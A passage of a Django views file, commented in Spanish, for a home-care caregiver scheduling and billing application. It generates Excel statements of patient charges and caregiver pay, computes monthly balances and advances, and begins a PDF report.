= 12\t# rut cuid.\n\tws.column_dimensions['R'].width = 14# nombre cuidador\n\tws.column_dimensions['S'].width = 12\t# tipo cuidador\n\tws.column_dimensions['T'].width = 14\t# tipo cuidador\n\n\tr=4\t# posicion de la primera fila\n\tws.cell(row=r-3,column=2).value = \"CARTOLA DE RECAUDACION\"\n\t\n\tws.cell(row=r-3,column=7).value = \"1=Contratado\"\n\tws.cell(row=r-2,column=7).value = \"2=Extra\"\n\n\tws.cell(row=r-3,column=20).value = \"1=Normal\"\n\tws.cell(row=r-2,column=20).value = \"2=Domingo\"\n\tws.cell(row=r-1,column=20).value = \"3=Festivo\"\n\n\tws.cell(row=r,column=2).value = \"Rut paciente\"\n\tws.cell(row=r,column=3).value = \"Paciente\"\n\tws.cell(row=r,column=4).value = \"Fecha pauta\"\n\n\tws.cell(row=r,column=5).value = \"Rut turno 1\"\n\tws.cell(row=r,column=6).value = \"Cuidador t1\"\n\tws.cell(row=r,column=7).value = \"Tipo Cuid t1\"\n\n\tws.cell(row=r,column=8).value = \"Rut turno 2\"\n\tws.cell(row=r,column=9).value = \"Cuidador t2\"\n\tws.cell(row=r,column=10).value = \"Tipo Cuid t2\"\n\n\tws.cell(row=r,column=11).value = \"Rut turno 3\"\n\tws.cell(row=r,column=12).value = \"Cuidador t3\"\n\tws.cell(row=r,column=13).value = \"Tipo Cuid t3\"\n\n\tws.cell(row=r,column=14).value = \"$ turno 1\"\n\tws.cell(row=r,column=15).value = \"$ turno 2\"\n\tws.cell(row=r,column=16).value = \"$ turno 3\"\n\n\tws.cell(row=r,column=17).value = \"$ paciente t1\"\n\tws.cell(row=r,column=18).value = \"$ paciente t2\"\n\tws.cell(row=r,column=19).value = \"$ paciente t3\"\n\n\tws.cell(row=r,column=20).value = \"recargo\"\n\tws.cell(row=r,column=21).value = \"Tot.turnos\"\n\t\n\tcell_range = ws['B1':'T4']\n\t#cell_range.bold = True\n\n\ttot1=0\t# valores de cuidador\n\ttot2=0\n\ttot3=0\n\ttot_pac1 = 0 # valores de paciente (o lo que pagael apoderado)\n\ttot_pac2 = 0 # valores de paciente (o lo que pagael apoderado)\n\ttot_pac3 = 0 # valores de paciente (o lo que pagael apoderado)\n\t\n\tva1=0\n\tva2=0\n\tva3=0\n\n\ttRecauda = 0\n\tsubtot = 0\n\trut_x = ''\n\tr=r+1\n\tfor q in query:\t\t# pauta_aux - dia a dia\n\t\tif q.rut != rut_x:\n\t\t\tws.cell(row=r,column=20).value = \"Subtotal:\"\t\n\t\t\tws.cell(row=r,column=21).value = subtot\n\n\t\t\tr=r+1\n\t\t\tws.cell(row=r,column=20).value = \"Tot.Anticipo:\"\n\t\t\ttotAnticipo = anticipos(rut_x,fecha_ini,fecha_fin)\n\n\t\t\tws.cell(row=r,column=21).value = totAnticipo\n\n\t\t\tr=r+1\n\t\t\tws.cell(row=r,column=20).value = \"Recauda:\"\n\t\t\tws.cell(row=r,column=21).value = subtot - totAnticipo\n\n\t\t\ttRecauda = 0\n\t\t\tsubtot = 0\n\n\t\t\tva1=0\n\t\t\tva2=0\n\t\t\tva3=0\n\n\t\t\trut_x = q.rut \t# paciente\n\t\t\tr=r+2\n\n\t\tws.cell(row=r,column=2).value = q.rut \n\t\tws.cell(row=r,column=3).value = q.paciente \n\t\tws.cell(row=r,column=4).value = q.fecha \t # fecha de la pauta\t\n\n\t\tws.cell(row=r,column=5).value = q.rut_t1\t # rut cuidador\n\t\tws.cell(row=r,column=6).value = q.turno1 # nombre cuidador\n\t\tws.cell(row=r,column=7).value = q.tipo_turno1 # Contratado - Extra\n\n\t\tws.cell(row=r,column=8).value = q.rut_t2\t # rut cuidador\n\t\tws.cell(row=r,column=9).value = q.turno2 # nombre cuidador\n\t\tws.cell(row=r,column=10).value = q.tipo_turno2 # Contratado - Extra\n\n\t\tws.cell(row=r,column=11).value = q.rut_t3\t # rut cuidador\n\t\tws.cell(row=r,column=12).value = q.turno3 \t # nombre cuidador\n\t\tws.cell(row=r,column=13).value = q.tipo_turno3 # Contratado - Extra\n\n\t\tws.cell(row=r,column=14).value = q.valor_t1\t# valor cuidador1\n\t\tws.cell(row=r,column=15).value = q.valor_t2 # valor cuidador2\n\t\tws.cell(row=r,column=16).value = q.valor_t3 # valor cuidador3\n\n\t\tws.cell(row=r,column=17).value = q.valor_p1\t# valor paciente\n\t\tws.cell(row=r,column=18).value = q.valor_p2 # valor paciente\n\t\tws.cell(row=r,column=19).value = q.valor_p3 # valor paciente\n\t\t#con recargo\n\t\tif q.reca_cui != '1':\n\t\t\tif q.valor_p1 != None:\n\t\t\t\tws.cell(row=r,column=17).value = q.valor_p1 * 1.5\n\t\t\tif q.valor_p2 != None:\n\t\t\t\tws.cell(row=r,column=18).value = q.valor_p2 * 1.5\n\t\t\tif q.valor_p3 != None:\n\t\t\t\tws.cell(row=r,column=19).value = q.valor_p3 * 1.5\n\n\t\tif q.valor_p1 != None:\n\t\t\tva1 = q.valor_p1\n\t\tif q.valor_p2 != None:\n\t\t\tva2 = q.valor_p2\n\t\tif q.valor_p3 != None:\n\t\t\tva3 = q.valor_p3\n\t\t#con recargo\t\n\t\tif q.reca_cui != '1': \n\t\t\tif q.valor_p1 != None:\n\t\t\t\tva1 = q.valor_p1 * 1.5\n\t\t\tif q.valor_p2 != None:\n\t\t\t\tva2 = q.valor_p2 * 1.5\n\t\t\tif q.valor_p3 != None:\n\t\t\t\tva3 = q.valor_p3 * 1.5\n\n\t\tws.cell(row=r,column=21).value = va1 + va2 + va3 \n\t\tsubtot = subtot + va1 + va2 + va3\n\t\t\n\t\tif q.valor_t1 != None:\n\t\t\ttot1 = tot1 + q.valor_t1\n\t\tif \tq.valor_p1 != None:\n\t\t\ttot_pac1 = tot_pac1 + q.valor_p1\n\n\t\tif q.valor_t2 != None:\t\n\t\t\ttot2 = tot2 + q.valor_t2\n\t\tif \tq.valor_p2 != None:\t\n\t\t\ttot_pac2 = tot_pac2 + q.valor_p2\n\n\t\tif q.valor_t3 != None:\t\n\t\t\ttot3 = tot3 + q.valor_t3\n\t\tif \tq.valor_p3 != None:\t\n\t\t\ttot_pac3 = tot_pac3 + q.valor_p3\n\n\t\tws.cell(row=r,column=20).value = q.reca_cui # recargo cuidador\n\n\t\tr=r+1 # contador defilas \n\n\tws.cell(row=r,column=20).value = \"Subtotal:\"\t\n\tws.cell(row=r,column=21).value = subtot\n\tr=r+1\n\tws.cell(row=r,column=20).value = \"Tot.Anticipo:\"\n\n\n\ttotAnticipo = anticipos(rut_x,fecha_ini,fecha_fin)\n\n\tws.cell(row=r,column=21).value = totAnticipo\n\n\tr=r+1\n\tws.cell(row=r,column=20).value = \"Recauda:\"\n\tws.cell(row=r,column=21).value = subtot - totAnticipo\t\n\ttRecauda = 0\n\t#rut_x = q.rut\n\tr=r+1\n\n\tws.delete_rows(5, 4) # elimina la fila 5, y mas 3 hacia abajo\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\t\n@login_required(login_url='login_ini')\ndef eliminapauvacias(request):\n\t# borra todos los registros de pauta de pacientes que no tengan ningun\n\t# turno asignado (registros vacios)\n\tvariable1 = 'Mantención de Parametros'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\terror_new = 'error1'\n\tpautaparaborrar = Pauta.objects.filter(turno1=None,turno2=None,turno3=None)\n\tx=0\n\tfor uu in pautaparaborrar:\n\t\tx=x+1\n\t\tuu.delete()\t\n\tx = str(x)\t\n\tcontext = {\n\t\t\"error_new\":error_new,\n\t\t\"variable1\":variable1,\n\t\t\"logo_corp\":logo,\n\t\t\"x\":x,\n\t\t}\t\n\treturn render(request,'menuparametros.html',context) \n\n\n# CARTOLA EXCEL PAGO CUIDADORES\n@login_required(login_url='login_ini')\ndef cartolacui(request):\n\tnom_arch = nombrearch()\t# Se forma string para nombre de archivo excel\n\tstring_nombre = 'cui'+nom_arch\n\tquery = Pagocui_aux.objects.all().order_by('rut_t1','fecha') # todas las pautas segun rango de fecha\n\t#\n\tfont = Font(name='Calibri',\n\t \t\tsize=11,\n\t\t\t\tbold=False,\n\t\t\t\titalic=False,\n\t\t\t\tvertAlign=None,\n\t\t\t\tunderline='none',\n\t\t\t\tstrike=False,\n\t\t\t\tcolor='FF000000')\n\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5\n\tws.column_dimensions['B'].width = 12\t# rut cuidador\n\tws.column_dimensions['C'].width = 36\t# nombre paciente\n\tws.column_dimensions['D'].width = 17\t# fecha\n\tws.column_dimensions['E'].width = 12\t# rut cuid.\n\tws.column_dimensions['F'].width = 23\t# nombre cuidador\n\tws.column_dimensions['G'].width = 12\t# tipo cuidador\n\t\n\tws.column_dimensions['H'].width = 9\t# valor turno1\n\tws.column_dimensions['I'].width = 9\t# valor turno2\n\tws.column_dimensions['J'].width = 9\t# valor turno3\n\n\tws.column_dimensions['K'].width = 11\t# recargo\n\tws.column_dimensions['L'].width = 9\t# totales turnos\n\n\tr=4\t# posicion de la primera fila\n\tws.cell(row=r-3,column=2).value = \"CARTOLA PAGO CUIDADORES\"\n\t_cell = ws.cell(row=1,column=2)\n\t_cell.font = Font(color=\"FF0000\")\n\t\n\tws.cell(row=r-3,column=7).value = \"1=Contratado\"\n\tws.cell(row=r-2,column=7).value = \"2=Extra\"\n\tws.cell(row=r-3,column=11).value = \"1=Normal\"\n\tws.cell(row=r-2,column=11).value = \"2=Domingo\"\n\tws.cell(row=r-1,column=11).value = \"3=Festivo\"\n\n\n\tws.cell(row=r,column=2).value = \"Rut Cuidador\"\n\tws.cell(row=r,column=3).value = \"Cuidador\"\n\tws.cell(row=r,column=4).value = \"Fecha pauta\"\n\tws.cell(row=r,column=5).value = \"Rut paciente\"\n\tws.cell(row=r,column=6).value = \"Paciente\"\n\n\tws.cell(row=r,column=7).value = \"Tipo turno\"\n\n\tws.cell(row=r,column=8).value = \"$ turno 1\"\n\tws.cell(row=r,column=9).value = \"$ turno 2\"\n\tws.cell(row=r,column=10).value = \"$ turno 3\"\n\n\tws.cell(row=r,column=11).value = \"recargo\"\n\tws.cell(row=r,column=12).value = \"A Pago\"\n\t\n\tva1=0\t# variables para acumular valores cuidador\n\tva2=0\n\tva3=0\n\n\tsubtot = 0\n\trut_x = ''\n\tr=r+1\n\tfor c in query:\t# pagocui_aux\n\t\tif c.rut_t1 != rut_x:\n\t\t\tws.cell(row=r,column=11).value = \"Sub Total:\"\t\n\t\t\tws.cell(row=r,column=12).value = subtot\n\t\t\tva1=0\n\t\t\tva2=0\n\t\t\tva3=0\n\t\t\tsubtot = 0\n\t\t\trut_x = c.rut_t1\t# pagocui_aux\n\t\t\tr=r+2\n\n\t\tws.cell(row=r,column=2).value = c.rut_t1\t # rut cuidador\n\t\tws.cell(row=r,column=3).value = c.turno1 # nombre cuidador\n\t\tws.cell(row=r,column=4).value = c.fecha \t # fecha de la pauta\t\n\t\tws.cell(row=r,column=5).value = c.rut \n\t\tws.cell(row=r,column=6).value = c.paciente \n\n\t\tws.cell(row=r,column=7).value = c.tipo_turno # Contratado - Extra\n\n\t\t# recargo cuidador\n\t\trecc = Param.objects.filter(tipo='RECC',codigo=c.reca_cui)\n\t\tfor erre in recc:\n\t\t\tval_reca = erre.valor1\n\n\t\tif c.turno == '1':\n\t\t\tif c.valor != None:\n\t\t\t\tva1 = c.valor\n\t\t\t\tws.cell(row=r,column=8).value = c.valor\n\t\t\t\tif c.reca_cui != 1:\n\t\t\t\t\tws.cell(row=r,column=8).value = val_reca\n\t\t\t\t\tva1 = val_reca\t\n\n\t\tif c.turno == '2':\n\t\t\tif c.valor != None:\n\t\t\t\tva2 = c.valor\n\t\t\t\tws.cell(row=r,column=9).value = c.valor\n\t\t\t\tif c.reca_cui != 1:\n\t\t\t\t\tws.cell(row=r,column=9).value = val_reca\n\t\t\t\t\tva2 = val_reca\n\n\t\tif c.turno == '3':\n\t\t\tif c.valor != None:\n\t\t\t\tva3 = c.valor\n\t\t\t\tws.cell(row=r,column=10).value = c.valor\n\t\t\t\tif c.reca_cui != 1:\n\t\t\t\t\tws.cell(row=r,column=10).value = val_reca\n\t\t\t\t\tva3 = val_reca\n\n\t\tws.cell(row=r,column=11).value = c.reca_cui # recargo cuidador\n\t\tws.cell(row=r,column=12).value = va1 + va2 + va3\n\t\tif c.tipo_turno == '1':\n\t\t\tws.cell(row=r,column=12).value = 0\n\t\t\tva1 = 0\n\t\t\tva2 = 0\n\t\t\tva3 = 0\n\t\tsubtot = subtot + va1 + va2 + va3\n\t\tva1 = 0\n\t\tva2 = 0\n\t\tva3 = 0\n\t\tr=r+1 # contador defilas \n\t\tws.cell(row=r,column=11).value = \"Sub Total:\"\t\n\t\tws.cell(row=r,column=12).value = subtot\n\n\tws.delete_rows(5,2) # elimina la fila 5, y total borra 2\n\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'attachment; filename='+string_nombre+'.xlsx'\n\twb.save(response)\n\treturn response\n\n\n@login_required(login_url='login_ini')\ndef grid_anticipos(request):\n\tvariable1 = 'Despliegue de Anticipos / Pagos de Paciente'\n\tfechahoy = datetime.now() \n\tnormal_abono = {'Normal':\"0\",'Abono':\"1\"}\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\n\tpaciente = Pacientes_aux.objects.all()\n\tfor ss in paciente:\n\t\trut_x = ss.rut\n\t\tnombre_x = ss.nombre\n\t\tfe_ini = ss.fe_ini\n\n\tdescriabon = Param.objects.filter(tipo='ABON')\t# Efec,Cheq,Tarj\n\n\tanticipo = Anticipos.objects.filter(rut=rut_x)\n\t#\n\t# Rescata el monto del abono inicial\n\tvalor_abono = 0\n\tif fe_ini != None:\n\t\tfe_i = str(fe_ini)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=rut_x,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe==True: \n\t\t\treg_anticipo = Anticipos.objects.get(rut=rut_x,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = reg_anticipo.valor\n\n\tcuenta = 0\n\ttot_valor = 0 \n\tfor ss in anticipo:\n\t\tcuenta = cuenta + 1\n\t\ttot_valor = tot_valor + ss.valor\n\n\tcontext = {\n\t\t\"anticipo\":anticipo,\n\t\t\"descriabon\":descriabon,\n\t\t\"cuenta\":cuenta,\n\t\t\"rut_x\":rut_x,\n\t\t\"nombre_x\":nombre_x,\n\t\t\"tot_valor\":tot_valor,\n\t\t\"normal_abono\":normal_abono,\n\t\t\"banco\":banco,\n\t\t\"variable1\":variable1,}\n\n\treturn render(request,'grid_anticipos.html',context)\n\n\ndef consultas(request):\t\t# menu de consultas e impresos\n\tvariable1 = 'Consultas e Impresos'\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tcontext ={ \"variable1\":variable1,\"logo_corp\":logo,}\n\treturn render(request,'consultas.html',context)\n\n\n@login_required(login_url='login_ini')\ndef info_mensual(request):\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\n\t# define 3 años para atras \n\tano = [0,0,0,ano_hoy]\n\tano[0] = ano_hoy - 3\n\tano[1] = ano_hoy - 2\n\tano[2] = ano_hoy - 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\t#\n\tif request.method == \"POST\":\n\t\tmes_hoy = request.POST.get('meses') # se devuelve \"Diciembre\"\n\t\tmes_numerico = meses.index(mes_hoy)+1\n\t\tano_hoy = request.POST.get('ano') # devuelve como caracter\n\t\tano_hoy = int(ano_hoy)\t\t\t\t# para el template ciclo FOR\n\n\t# pauta solo del presente mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\t# Esten en rango de fecha, y que: valor_t1,valor_t2 y valor_t3 no esten vacios\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None).order_by('paciente') \n\t#\n\tpaciente = Pacientes.objects.filter(estado=False).order_by('nombre') \n\n\t#saldoant = Saldos.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut=rut_x) \n\n\t# activa tabla Mensual_aux para pasarla en el context\n\tmensual_aux = Mensual_aux.objects.all()\n\t# limpia tabla auxiliar para el: RESUMEN DE PRESTACIONES\n\tMensual_aux.objects.all().delete() # borra todo el contenido de la tabla\n\n\tcursor = connection.cursor() # es necesario: from django.db import connection\n\tcuenta = 0 \n\txcobrar = 0\n\tfor pcte in paciente: \n\t\trut_x = pcte.rut\n\t\tpaciente_x = pcte.nombre\n\n\t\tsaldoant_x = 0\n\t\tsaldoant_x = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py \n\t\tif saldoant_x == None:\n\t\t\tsaldoant_x = 0\n\n\t\tcon_x = pcte.f_apod\t\t# fono contacto\n\t\t# funcion entrega un arreglo\n\t\tarreglo_uno = nturnos(rut_x,fecha_ini,fecha_fin) # en misfunciones.py\n\t\tturnos_x = arreglo_uno[0]\n\t\tvalmes_x = arreglo_uno[1]\n\t\t#abonos_x = arreglo_uno[2]\n\n\t\tabonos_x = 0\n\t\tset_abonos = Anticipos.objects.filter(rut=rut_x,fecha__range=(fecha_ini, fecha_fin)).order_by('fecha')\n\t\tif set_abonos != None:\n\t\t\tfor ab in set_abonos:\n\t\t\t\tabonos_x = abonos_x + ab.valor\n\n\t\tsaldo_x = valmes_x + saldoant_x - abonos_x \n\t\txcobrar = xcobrar + saldo_x\n\n\t\tgrabasaldo(paciente_x,rut_x,saldo_x,str(mes_numerico).zfill(2),ano_hoy) # en misfunciones.py\n\t\t\t\t\n\t\tcursor.execute(\n\t\t\"insert into ai_mensual_aux (rut,paciente,con,turnos,val_mes,saldoant,abonos,saldo,mes,ano,celular,correo,n_apod)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,paciente_x,con_x,turnos_x,valmes_x,saldoant_x,abonos_x,saldo_x,mes_numerico,ano_hoy,pcte.f_apod,pcte.correo_apod,pcte.n_apod])\n\n\t\tcuenta = cuenta + 1\n\n\tvariable1 = 'Resumen de prestaciones mes de: '+mes_hoy+\" \"+str(ano_hoy)\n\n\tcontext ={\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"mensual_aux\":mensual_aux,\n\t\t\t\"logo_corp\":logo,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo\":logo,\n\t\t\t\"meses\":meses,\n\t\t\t\"ano\":ano,\n\t\t\t\"mes_hoy\":mes_hoy,\n\t\t\t\"ano_hoy\":ano_hoy,\n\t\t\t\"xcobrar\":xcobrar,}\n\treturn render(request,'grid_mensual.html',context)\n\n\n@login_required(login_url='login_ini')\ndef info_diario(request,rut,mes,ano):\n\t# Viene de href del nombre en \"GRID_MENSUAL.HTML\"\n\trut_x = rut\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\tmes_hoy = int(mes) \n\tano_hoy = int(ano) \n\tmes_numerico = mes_hoy\n\n\t# define 3 años para atras \n\tano = [0,0,0,ano_hoy]\n\tano[0] = ano_hoy - 3\n\tano[1] = ano_hoy - 2\n\tano[2] = ano_hoy - 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\n\t# pauta solo del presente mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)\n\n\tusuario_y = request.session.get('username_x') # variable gurdada en view plantilla_base 08042020\n\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut=rut_x) \n\t# trae 4 elementos\n\n\tif pauta == None:\n\t\treturn HttpResponse(\"No hay datos en Pauta\")\n\n\tpaciente = Pacientes.objects.filter(estado=False,rut=rut_x) \n\tfor pcte in paciente:\n\t\tpaciente_x = pcte.nombre\n\t\t#saldoant_x = pcte.saldoant\t\n\n\t# para pasarla en el contexto\n\tdiario_aux = Diario_aux.objects.filter(username=usuario_y)\t# 08042020\n\n\t# limpia tabla diario_aux para DETALLE DIARIO DE PRESTACIONES\n\tcursor = connection.cursor() \n\tcursor.execute(\"delete from ai_diario_aux where username = %s\",[usuario_y]) \n\n\t# Trae todos los pagos y/o anticipos del periodo en cuestión\n\tanticipo = Anticipos.objects.filter(rut=rut_x,fecha__range=(fecha_ini, fecha_fin)).order_by('fecha')\n\n\t# Prepara DIARIO_AUX (el mes completo) para DETALLE DIARIO DE PRESTACIONES\n\t# trae 31 registros o los dias que tenga el mes con campo marcado para el usuario\n\tpreparadia(rut_x,mes_numerico,ano_hoy,totdias,paciente_x,usuario_y) # en 'misfunciones' # usuario_y\n\n\t# graba diario_aux anticipos/abonos en ai_diario_aux del periodo seleccionado\n\tpagos_x = 0\n\tabonos_x = 0\n\n\t# puebla abonos - anticipos en diario_aux\n\tfor an in anticipo:\n\t\tfe_x = an.fecha\n\t\tfe_x = str(fe_x)[0:10]\n\t\tfe_x = fe_x+\" 00:00:00\" # formato necesario para que lo encuentre en diario_aux\n\t\t\n\t\tabonos_x = anticipos(rut_x,fe_x,fe_x) # solo del dia (aunque hayan dos pagos en el mismo dia)\n\t\t#\n\t\tboleta_x = 0\n\t\tif an.boleta != None:\n\t\t\tboleta_x = an.boleta\n\n\t\tcursor.execute(\n\t\t\t\"update ai_diario_aux set abonos=%s, boleta=%s where fecha = %s and username= %s\"\n\t\t\t,[abonos_x,boleta_x,fe_x,usuario_y] # \n\t\t)\n\t\tpagos_x = pagos_x + an.valor\n\t\t\t\n\t# Puebla desde pauta a pauta_aux \n\tcuenta = 0 \n\tacum1_x = 0\n\tacum2_x = 0\n\ttot_turnos = 0\n\n\t# actualiza diario_aux con valores de PAUTA dia a dia\n\tfor paut in pauta: \t# cada dia del mes para este rut\n\t\tfecha_x = paut.fecha\n\t\tfecha_x = str(fecha_x)[0:10] # entrega solo '999-99-99'\n\t\tfecha_x = fecha_x+\" 00:00:00\" # formato necesario para que lo encuentre\n\t\t\t\t\t\t\t\t\t\t# en diario_aux\t\n\t\tvalt1 = 0\n\t\tvalt2 = 0\n\t\tvalt3 = 0\n\n\t\tcuenta = cuenta + 1\n\n\t\tsaldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones.py\n\t\tif saldo_ant == None:\n\t\t\tsaldo_ant = 0\t\n\n\t\ttur1_x = paut.turno1\n\t\tif tur1_x != '' and tur1_x != None:\t\n\t\t\ttur1_x = 1\n\t\t\tvalt1 = paut.valor_p1\n\t\t\tif valt1 == None:\n\t\t\t\tvalt1 = 0\n\t\telse:\n\t\t\ttur1_x = 0\t\n\t\t\n\t\ttur2_x = paut.turno2\n\t\tif tur2_x != '' and tur2_x != None:\n\t\t\ttur2_x = 1\n\t\t\tvalt2 = paut.valor_p2\n\t\t\tif valt2 == None:\n\t\t\t\tvalt2 = 0 \n\t\telse:\n\t\t\ttur2_x = 0\t\n\t\t\n\t\ttur3_x = paut.turno3\n\t\tif tur3_x != '' and tur3_x != None:\n\t\t\ttur3_x = 1\n\t\t\tvalt3 = paut.valor_p3\n\t\t\tif valt3 == None:\n\t\t\t\tvalt3 = 0\n\t\telse:\n\t\t\ttur3_x = 0\t\n\n\t\ttot_turnos = tot_turnos + tur1_x + tur2_x + tur3_x\t\n\t\tvaltot = valt1 + valt2 + valt3 # + saldo_ant\n\n\t\tacum1_x = acum1_x + valtot\n\t\tnotas_x = paut.notas\n\n\t\t#busca el dia y actualiza\n\t\tcursor.execute(\n\t\t\t\"update ai_diario_aux set paciente = %s,turno1=%s,turno2=%s,turno3=%s,\"\n\t\t\t\"valor_t1=%s,valor_t2=%s,valor_t3=%s,val_tot=%s,acum1=%s\"\n\t\t\t\"where fecha = %s and username = %s\"\n\t\t\t,[paciente_x,tur1_x,tur2_x,tur3_x,valt1,valt2,valt3,\n\t\t\tvaltot,acum1_x,fecha_x,usuario_y])\t# \n\t\t\n\t# Efectua recalculo de saldo final (acum2)\n\tacum2_x = 0\n\tsaldo1_x = 0\n\tsaldo2_x = 0\n\tneto_x = 0\n\tsaldo_ant = saldoant(rut_x,mes_numerico,ano_hoy) # misfunciones\n\n\t#return HttpResponse(str(saldo_ant))\n\n\tk=0 # para que solo grabe en el primer registro el saldo anterior\n\n\t# graba acum1 y acum2 en diario_aux\n\tfor rec in diario_aux:\n\t\tif rec.username == usuario_y: # \n\t\t\tsaldo1_x = saldo1_x + rec.val_tot\n\t\t\trec.acum1 = saldo1_x \n\t\t\t\n\t\t\tneto_x = neto_x + (rec.valor_t1 + rec.valor_t2 + rec.valor_t3)\t\t\n\t\n\t\t\tif k==0: \n\t\t\t\tsaldo2_x = saldo2_x + rec.val_tot - rec.abonos + saldo_ant \n\t\t\telse:\n\t\t\t\tsaldo2_x = saldo2_x + rec.val_tot - rec.abonos\t\n\t\n\t\t\trec.acum2 = saldo2_x\n\t\t\t\n\t\t\trec.save()\n\t\t\tk=k+1 \n\t \n\trequest.session['rut_pac'] = rut_x # crea variable global para pdfdetalle.view \n\trequest.session['neto_x'] = neto_x # crea variable global\n\n\tvariable1 = \"Paciente: \"+rut_x+\" \"+paciente_x+\" \"+mes_hoy+\"-\"+str(ano_hoy)\n\n\tcontext = {\n\t\t\t\"diario_aux\":diario_aux,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"cuenta\":cuenta,\n\t\t\t\"logo_corp\":logo_corp,\n\t\t\t\"logo_excel\":logo_excel,\n\t\t\t\"logo_pdf\":logo_pdf,\n\t\t\t\"tot_turnos\":tot_turnos,\n\t\t\t\"pagos_x\":pagos_x,\n\t\t\t\"acum1_x\":neto_x,\n\t\t\t\"acum2_x\":saldo2_x,\n\t\t\t\"saldo_ant\":saldo_ant,}\n\treturn render(request,'grid_infodiario.html',context)\n\n\n@login_required(login_url='login_ini')\ndef pdfdetalle(request):\n\t#nom_arch = \"detalle\"+nombrearch()+\".pdf\" # nombre del PDF\n\tancho, alto = letter\n\t\n\t#paciente = Pacientes_aux.objects.all()\t \n\t#for ss in paciente:\t\t\t\t\t\t \n\t# rut_aux = ss.rut \t \t\t\t\t \n\t#\trut_apod = ss.rut_apod \t\t\t\t\t \n\n\trut_aux = request.session.get('rut_pac') # rescata variable global \n\tusername = request.session.get('username_x') \t \n\t#\n\tnom_arch = \"pdf_detalle\"+nombrearch()+\".pdf\" # nombre del PDF # \n\tpaciente = Pacientes.objects.get(rut=rut_aux) \t # \n\trut_apod = paciente.rut_apod \t\t\t\t\t # \n\t#\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\t# desarrollo\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\n\t# produccion\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t\n\tc.setPageSize((ancho, alto))\n\t#\n\t# Borra archivos anteriores PDF's de la carpeta PDFS\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\tarch_y = os.listdir(path_x) #lista todos los que esten es esa ruta\n\n\t# Elimina solo los archivos generados por el actual usuario # \n\tfor arch_pdf in arch_y: # \n\t\tif arch_pdf.find(username) >= 0: # si nombre de usuario esta contenido en el nombre del archivo # \n\t\t\tremove(path_x+arch_pdf) # \n\n\t#diarioaux = Diario_aux.objects.all().order_by('ndia') # \n\tdiarioaux = Diario_aux.objects.filter(username=username).order_by('ndia') # 04-04-2020\n\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\t\n\tfor fe in diarioaux:\n\t\tpaciente_x = fe.paciente\t\n\t\trut_x = fe.rut\n\t\tfecha_x = fe.fecha\n\t\tcdia_x = fe.cdia\n\t\tndia_x = fe.ndia\n\t\tmes_hoy = fecha_x.month\n\t\tm_x = fecha_x.month\n\t\tmes_hoy = meses[mes_hoy - 1] # mes en palabras\n\t\tano_hoy = fecha_x.year\n\t\tacum2 = fe.acum2\n\t\t#cadena.rjust(50, \"=\")\n\n\ttotdias = calendar.monthrange(ano_hoy,m_x)[1] #total de dias del mes\n\tfecha_ini = 